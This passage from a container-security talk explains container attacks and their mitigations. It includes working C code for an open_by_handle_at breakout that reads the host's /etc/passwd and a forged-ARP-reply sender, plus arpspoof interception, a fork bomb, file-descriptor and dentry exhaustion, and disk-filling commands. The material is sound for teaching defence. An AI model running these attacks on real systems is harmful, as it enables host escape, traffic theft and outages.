  119. open_by_handle_at
      $ stat /etc/passwd
        File: '/etc/passwd'
        Size: 1724   Blocks: 8   IO Block: 4096   regular file
      Device: 801h/2049d   Inode: 57824   Links: 1
      $ haconiwa start sample4.haco
      root@sample1:/# vim read_passwd.c
      // Change to your host's inode number, e.g. 57824 = 0xe1e0:
          .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
      };

  120. open_by_handle_at
      root@sample1:/# gcc read_passwd.c
      root@sample1:/# ./a.out
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      bin:x:2:2:bin:/bin:/usr/sbin/nologin
      …
      vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
      ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
      lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

  121. Getting a shell on the host
      root@sample1:/# gcc breakout.c
      root@sample1:/# ./a.out
      $ sudo haconiwa start demo1.haco
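The handle construction of slides 116-119 carried through to a working open_by_handle_at(2) call, as an added example (read_passwd.c and breakout.c themselves are not on the page). Assumptions: ext4 or another filesystem using handle type 1 (a 32-bit inode followed by a 32-bit generation), glibc 2.14 or later for the wrapper, and CAP_DAC_READ_SEARCH inside the container; without that capability the call fails with EPERM, which is exactly what dropping it buys you. The inode 23125 is the one from slide 118; pass another number and a directory on the target filesystem as arguments. The generation field is left at zero, which ext4 accepts for any generation:

```c
// Added example, not the deck's read_passwd.c: build an ext4-style handle from
// an inode number and open it. Needs CAP_DAC_READ_SEARCH; inode defaults to the
// 23125 of slide 118, mount_fd to "/" (use a host bind mount in a container).
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define FILEID_INO32_GEN 1   /* handle_type used by ext4 and most other filesystems */

struct my_file_handle {
    unsigned int handle_bytes;
    int handle_type;
    unsigned char f_handle[8];
};

/* Encode an inode number as a type-1 file handle. The generation (bytes 4-7)
   stays 0: ext4 only compares it when it is non-zero, so 0 matches anything. */
void build_ino_handle(uint32_t ino, struct my_file_handle *h) {
    memset(h, 0, sizeof *h);
    h->handle_bytes = 8;
    h->handle_type = FILEID_INO32_GEN;
    h->f_handle[0] = ino & 0xff;            /* little-endian: 23125 -> 55 5a 00 00 */
    h->f_handle[1] = (ino >> 8) & 0xff;
    h->f_handle[2] = (ino >> 16) & 0xff;
    h->f_handle[3] = (ino >> 24) & 0xff;
}

/* Test helper: byte `i` of the handle built for `ino`. */
int handle_byte(uint32_t ino, int i) {
    struct my_file_handle h;
    build_ino_handle(ino, &h);
    return h.f_handle[i];
}

/* Open inode `ino` on the filesystem `mount_fd` lives on, bypassing the path
   permission checks. Returns an fd or -1 with errno set (EPERM without
   CAP_DAC_READ_SEARCH, ESTALE if no such inode). */
int open_ino(int mount_fd, uint32_t ino, int flags) {
    struct my_file_handle h;
    build_ino_handle(ino, &h);
    return open_by_handle_at(mount_fd, (struct file_handle *)&h, flags);
}

int main(int argc, char **argv) {
    uint32_t ino = argc > 1 ? (uint32_t)strtoul(argv[1], NULL, 0) : 23125;
    /* Any fd on the target filesystem works as mount_fd; inside a container a
       directory bind-mounted from the host is the usual foothold (slide 115). */
    int mount_fd = open(argc > 2 ? argv[2] : "/", O_RDONLY | O_DIRECTORY);
    if (mount_fd < 0) { perror("open mount_fd"); return 1; }
    int fd = open_ino(mount_fd, ino, O_RDONLY);
    if (fd < 0) { perror("open_by_handle_at"); return 1; }
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) fwrite(buf, 1, n, stdout);
    close(fd);
    return 0;
}
```

Run it as `./a.out 23125 /mnt/hostdir` inside a container that has a bind mount from the host's root filesystem: with CAP_DAC_READ_SEARCH it prints the host's /etc/passwd exactly as on slide 120; with the capability dropped the same call reports "Operation not permitted". Note that an overlayfs container root is not the host filesystem, which is why the deck insists on the bind mount.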
  122. The Swiss cheese model
      - Some of the security mechanisms used for containers overlap in function.
      - For example, a given system call may be blocked both by capabilities and by seccomp.
      - Even if one mechanism is bypassed, another one blocks or mitigates the attack.
      - Even if seccomp is bypassed, capabilities stop it.

  123. Container networking

  124. Container Network
      - With LXD's default configuration a bridge is created (diagram: eth0 on the host, the lxdbr0 bridge, and a veth0/eth0 pair into each container).

  125. Bridge Network
      $ ip addr show dev lxdbr0
      4: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
          link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff
          inet 10.152.207.1/24 scope global lxdbr0
             valid_lft forever preferred_lft forever
          inet6 fd2e:8281:6de5:9841::1/64 scope global
             valid_lft forever preferred_lft forever
          inet6 fe80::281a:c0ff:fed1:4b28/64 scope link
             valid_lft forever preferred_lft forever

  126. Container Network
      - If you are hosting containers, they receive traffic from the Internet.
      - What if a user inside a container could intercept that traffic…?
      (image: hex dump of a captured packet)
      4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

  127. ARP Spoofing
      - Uses the nature of ARP to change where traffic is routed.
      - It works because hosts trust their ARP table (the address mapping table).
      - By forging replies, the ARP table can be poisoned with wrong entries.
      (same hex dump as slide 126)

  128. ARP table
      vagrant@ubuntu-xenial:~$ lxc list
      attacker | RUNNING | 10.128.193.110 (eth0)
      victim   | RUNNING | 10.128.193.231 (eth0)
      vagrant@ubuntu-xenial:~$ arp -a
      ? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0   # victim
      ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
      ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0   # attacker
      ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

  129. Confirm the containers can reach each other
      vagrant@ubuntu-xenial:~$ lxc exec attacker bash
      root@test1:~# ping 10.128.193.231   # victim ip
      PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data.
      64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms
      ^C
      --- 10.128.193.231 ping statistics ---
      1 packets transmitted, 1 received, 0% packet loss, time 0ms
      rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms

  130. ARP Spoofing
      root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null &
      [1] 1619
      root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null &
      [2] 1620
      The first command tells the victim that the gateway 10.128.193.1 is at the attacker's MAC; the second tells the gateway (the host's lxdbr0) that the victim is. Both directions are needed to see a full connection.

  131. ARP table
      vagrant@ubuntu-xenial:~$ arp -a
      ? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0
      ? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
      ? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0
      ? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3
      On the host, the victim's IP now resolves to the attacker's MAC.

  132. Capture the packets
      root@attacker:~# tcpdump -i any -vv -w test.pcap
      vagrant@ubuntu-xenial:~/shared$ curl 10.128.193.231

  133. Look at the captured packets
      $ lxc file pull attacker/root/test.pcap ./
      $ tcpdump -X tcp port 80 -r test.pcap
      0x0000:  4500 0082 2126 4000 3f06 8267 0a80 c101  E...!&@.?..g....
      0x0010:  0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be  .....(.P........
      0x0020:  8018 00e5 985d 0000 0101 080a 001b d7cb  .....]..........
      0x0030:  001b d7cb 4745 5420 2f20 4854 5450 2f31  ....GET./.HTTP/1
      0x0040:  2e31 0d0a 486f 7374 3a20 3130 2e31 3238  .1..Host:.10.128
      0x0050:  2e31 3933 2e32 3331 0d0a 5573 6572 2d41  .193.231..User-A
      0x0060:  6765 6e74 3a20 6375 726c 2f37 2e34 372e  gent:.curl/7.47.
      0x0070:  300d 0a41 6363 6570 743a 202a 2f2a 0d0a  0..Accept:.*/*..
      0x0080:  0d0a                                     ..
      The host's HTTP request to the victim (10.128.193.1 -> 10.128.193.231) is readable from the attacker container.
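What arpspoof is sending in the background on slide 130, as an added example that is not arpspoof's code: one forged ARP reply telling the victim that the gateway 10.128.193.1 lives at the attacker's MAC, built byte by byte and checked before anything goes on the wire. The addresses are the ones from slides 128-131; the send path assumes Linux AF_PACKET and an interface named eth0, and needs CAP_NET_RAW, which is the capability slide 112 drops:

```c
// Added example, not arpspoof: one forged ARP reply as on slide 130.
// Addresses from slides 128-131; sending assumes Linux AF_PACKET, an interface
// named eth0 and CAP_NET_RAW.
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <net/if.h>
#include <netpacket/packet.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

#define ARP_FRAME_LEN 42   /* 14-byte Ethernet header + 28-byte ARP payload */

/* Build "sender_ip is at sender_mac", addressed to target_mac/target_ip.
   Returns the frame length (42) or 0 if an address does not parse. */
size_t build_arp_reply(uint8_t out[ARP_FRAME_LEN],
                       const uint8_t sender_mac[6], const char *sender_ip,
                       const uint8_t target_mac[6], const char *target_ip) {
    struct in_addr sip, tip;
    if (inet_pton(AF_INET, sender_ip, &sip) != 1 ||
        inet_pton(AF_INET, target_ip, &tip) != 1) return 0;
    uint8_t *p = out;
    memcpy(p, target_mac, 6); p += 6;          /* Ethernet dst */
    memcpy(p, sender_mac, 6); p += 6;          /* Ethernet src */
    *p++ = 0x08; *p++ = 0x06;                  /* EtherType: ARP */
    *p++ = 0x00; *p++ = 0x01;                  /* HTYPE: Ethernet */
    *p++ = 0x08; *p++ = 0x00;                  /* PTYPE: IPv4 */
    *p++ = 6;    *p++ = 4;                     /* HLEN, PLEN */
    *p++ = 0x00; *p++ = 0x02;                  /* OPER: 2 = reply */
    memcpy(p, sender_mac, 6); p += 6;          /* SHA: the attacker's MAC */
    memcpy(p, &sip, 4);       p += 4;          /* SPA: the IP being impersonated */
    memcpy(p, target_mac, 6); p += 6;          /* THA */
    memcpy(p, &tip, 4);       p += 4;          /* TPA */
    return (size_t)(p - out);
}

/* Field accessors used by the self-check. */
int arp_opcode(const uint8_t *f) { return (f[20] << 8) | f[21]; }
uint32_t arp_sender_ip(const uint8_t *f) {
    uint32_t v; memcpy(&v, f + 28, 4); return ntohl(v);
}

/* Push one frame out of `ifname`. Returns 0, or -1 (EPERM without CAP_NET_RAW). */
int send_frame(const char *ifname, const uint8_t *frame, size_t len) {
    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP));
    if (s < 0) return -1;
    struct sockaddr_ll addr = { .sll_family = AF_PACKET,
                                .sll_ifindex = (int)if_nametoindex(ifname),
                                .sll_halen = 6 };
    memcpy(addr.sll_addr, frame, 6);
    ssize_t n = sendto(s, frame, len, 0, (struct sockaddr *)&addr, sizeof addr);
    close(s);
    return n == (ssize_t)len ? 0 : -1;
}

/* Self-check: the frame for "gateway 10.128.193.1 is at the attacker's MAC",
   sent to the victim, has the expected layout. */
int selftest_arp_reply(void) {
    const uint8_t attacker[6] = {0x00, 0x16, 0x3e, 0x1d, 0x73, 0x72};   /* slide 128 */
    const uint8_t victim[6]   = {0x00, 0x16, 0x3e, 0x6a, 0x55, 0x5d};
    uint8_t f[ARP_FRAME_LEN];
    size_t n = build_arp_reply(f, attacker, "10.128.193.1", victim, "10.128.193.231");
    return n == ARP_FRAME_LEN && f[12] == 0x08 && f[13] == 0x06 &&
           arp_opcode(f) == 2 && arp_sender_ip(f) == 0x0a80c101u &&
           memcmp(f, victim, 6) == 0 && memcmp(f + 22, attacker, 6) == 0;
}

int main(void) {
    const uint8_t attacker[6] = {0x00, 0x16, 0x3e, 0x1d, 0x73, 0x72};
    const uint8_t victim[6]   = {0x00, 0x16, 0x3e, 0x6a, 0x55, 0x5d};
    uint8_t frame[ARP_FRAME_LEN];
    size_t n = build_arp_reply(frame, attacker, "10.128.193.1", victim, "10.128.193.231");
    for (size_t i = 0; i < n; i++) printf("%02x%s", frame[i], i % 16 == 15 ? "\n" : " ");
    printf("\n");
    /* arpspoof repeats this every couple of seconds, in both directions. */
    if (send_frame("eth0", frame, n) < 0) perror("send_frame (CAP_NET_RAW?)");
    return 0;
}
```

The victim accepts this reply without ever having asked, which is the whole weakness. Dropping CAP_NET_RAW (slide 112) stops the container from opening the AF_PACKET socket; on a bridge that many containers share, the remaining defences are static ARP entries or per-port MAC/IP filtering on the bridge, since the protocol itself has no authentication.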
  134. Other attack surfaces

  135. Reading and clearing the dmesg buffer
      root@sample1:/# dmesg
      [  311.470895] EXT4-fs (sda1): error count since last fsck: 28
      [  311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691
      [  311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449
      …
      root@06399a7a8814:/# dmesg -C
      root@06399a7a8814:/# dmesg
      The kernel log is host-wide: a container that can read it learns about the host's hardware and other tenants, and dmesg -C wipes it for everyone. Clearing always needs CAP_SYSLOG, and with kernel.dmesg_restrict=1 reading does too, so dropping that capability closes both.

  136. Mass creation of negative dentries
      root@sample1:/# perl -e 'stat("/$_") for 1..100000000'
      vagrant@ubuntu-xenial:~$ sudo slabtop
       Active / Total Objects (% used)    : 4172542 / 4182249 (99.8%)
       Active / Total Slabs (% used)      : 197606 / 197606 (100.0%)
       Active / Total Caches (% used)     : 78 / 122 (63.9%)
       Active / Total Size (% used)       : 790487.34K / 794654.96K (99.5%)
       Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K
        OBJS    ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
       4050564 4050564 100%    0.19K 192884       21    771536K dentry
      Every stat() of a path that does not exist leaves a negative dentry in the host's slab cache. That is kernel memory, so the container fills it whether or not it has a memory limit, unless the memory cgroup also accounts kernel memory.

  137. Mass creation of file descriptors
      - There is a limit on how many file descriptors can be open; see /proc/sys/fs/file-max.
      - If a process in a container opens that many, the host side is affected as well (when uids are shared). file-max is system-wide, so exhausting it hits every process on the host; the per-process limit is RLIMIT_NOFILE (ulimit -n), which a container usually runs into first.
      for (i = 0; ; i++) {                 /* open files until open(2) fails */
          sprintf(buf, "/tmp/%d", i);
          int fd = open(buf, O_CREAT, 0644);
          if (fd == -1) {
              printf("max fd %d\n", i);
              break;
          }
      }
      for (;;);                            /* keep them open */

  138. Fork bomb
      $ :(){ :|: & };:
      $ for i in {1..9999}; do sleep infinity & done

  139. Disk space
      $ fallocate -l 20g big_file
      - If the container has no disk quota, creating large files can fill up the host's disk.
      $ dd if=/dev/zero of=tempfile bs=20GB count=10

  140. Summary (photo: flic.kr)

  141. Summary
      - Linux containers are protected by multiple security mechanisms.
      - Swiss cheese model (e.g. even if seccomp is defeated, capabilities remain).
      - A misconfiguration lets a container affect the host and other containers.
      - LXC, Docker and the like ship default settings that block these attacks.
      - Maybe there are still gaps, though (CVE-…)

  142. Want to work at Pepabo too? Check the latest job openings → @pb_recruit